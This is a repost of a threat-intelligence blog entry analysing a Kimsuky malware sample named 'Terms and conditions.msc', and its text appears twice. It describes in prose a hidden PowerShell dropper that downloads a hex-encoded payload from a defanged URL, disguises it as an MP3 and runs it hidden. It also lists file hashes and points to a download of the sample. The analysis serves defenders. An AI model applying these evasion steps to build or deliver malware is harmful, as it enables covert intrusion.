2024-09-10 Sakai @sakaijjang 김수키(Kimsuky) 에서 만든 악성코드-Terms and conditions(이용 약관).msc(2024.9.6)   – Kimsuky (North Korea) – Terms and Conditions.msc

by https://x.com/sakaijjang?lang=en 

Article translation in English 

More about Kimsuky: 2020-10-27 CISA North Korean Advanced Persistent Threat Focus

 The malware is delivered as a file named “Terms and conditions.msc,” containing embedded PowerShell commands.The PowerShell script is executed in a hidden window (-WindowStyle Hidden), preventing user awareness.The script uses Invoke-Expression (iex) to execute code and Invoke-WebRequest (iwr) to download a malicious script from hxxps://0x0(.)st/Xyl7(.)txt.The downloaded data, encoded in hexadecimal, is decoded into a byte array.The decoded data is initially saved as an MP3 file (e.g., vBqz.mp3) in the system’s public documents folder.The MP3 file is then renamed to an executable file (e.g., vBqz.exe), disguising the payload as a media file.The executable is run using conhost.exe in the background with the -NoNewWindow option, ensuring it remains hidden.File Camouflage: The use of the MP3 extension initially disguises the executable file.Stealthy Execution: Utilizing system utilities like conhost.exe and executing commands in hidden windows help evade user detection and security software.Command-and-Control (C2) Infrastructure: The malware’s reliance on a public site for payload distribution suggests a flexible and easily reconfigurable C2 mechanism.Hexadecimal Encoding: The use of encoded data indicates potential obfuscation techniques; decoding this data can reveal more about the malware.Potential Variants: Different versions of this malware may exist, with variations in the payload or C2 URLs. Monitoring and updating detection rules, such as YARA, would be beneficial.

Download
File Information
Name: Terms and conditions.msc
Size: 141 KB
MD5: 81d224649328a61c899be9403d1de92d
SHA-1: f4895809cb38fa1f225340e99c05e477a5017111
SHA-256: cea22277e0d7fe38a3755bdb8baa9fe203bd54ad4d79c7068116f15a50711b09
Malware Repo Links
Over the past 15 years, as the blog has been around, many hosting providers have dropped support due to stricter no-malware policies. This has led to broken links, especially in older posts. If you find a broken link on contagiodump.blogspot.com (or contagiominidump.blogspot.com), just note the file name from the URL and search for it in the Contagio Malware Storage.

Article Link: contagio: 2024-09-10 KIMSUKY (North Korean APT) Sample (Sakai @sakaijjan – Terms and Conditions.msc)

1 post – 1 participant

Read full topic

​ 2024-09-10 Sakai @sakaijjang 김수키(Kimsuky) 에서 만든 악성코드-Terms and conditions(이용 약관).msc(2024.9.6)   – Kimsuky (North Korea) – Terms and Conditions.mscby https://x.com/sakaijjang?lang=en Article translation in English More about Kimsuky: 2020-10-27 CISA North Korean Advanced Persistent Threat Focus The malware is delivered as a file named “Terms and conditions.msc,” containing embedded PowerShell commands.The PowerShell script is executed in a hidden window (-WindowStyle Hidden), preventing user awareness.The script uses Invoke-Expression (iex) to execute code and Invoke-WebRequest (iwr) to download a malicious script from hxxps://0x0(.)st/Xyl7(.)txt.The downloaded data, encoded in hexadecimal, is decoded into a byte array.The decoded data is initially saved as an MP3 file (e.g., vBqz.mp3) in the system’s public documents folder.The MP3 file is then renamed to an executable file (e.g., vBqz.exe), disguising the payload as a media file.The executable is run using conhost.exe in the background with the -NoNewWindow option, ensuring it remains hidden.File Camouflage: The use of the MP3 extension initially disguises the executable file.Stealthy Execution: Utilizing system utilities like conhost.exe and executing commands in hidden windows help evade user detection and security software.Command-and-Control (C2) Infrastructure: The malware’s reliance on a public site for payload distribution suggests a flexible and easily reconfigurable C2 mechanism.Hexadecimal Encoding: The use of encoded data indicates potential obfuscation techniques; decoding this data can reveal more about the malware.Potential Variants: Different versions of this malware may exist, with variations in the payload or C2 URLs. Monitoring and updating detection rules, such as YARA, would be beneficial.Download Download. Email me if you need the password scheme.File InformationName: Terms and conditions.mscSize: 141 KBMD5: 81d224649328a61c899be9403d1de92dSHA-1: f4895809cb38fa1f225340e99c05e477a5017111SHA-256: cea22277e0d7fe38a3755bdb8baa9fe203bd54ad4d79c7068116f15a50711b09Malware Repo LinksOver the past 15 years, as the blog has been around, many hosting providers have dropped support due to stricter no-malware policies. This has led to broken links, especially in older posts. If you find a broken link on contagiodump.blogspot.com (or contagiominidump.blogspot.com), just note the file name from the URL and search for it in the Contagio Malware Storage.
Article Link: contagio: 2024-09-10 KIMSUKY (North Korean APT) Sample (Sakai @sakaijjan – Terms and Conditions.msc)
1 post – 1 participant
Read full topic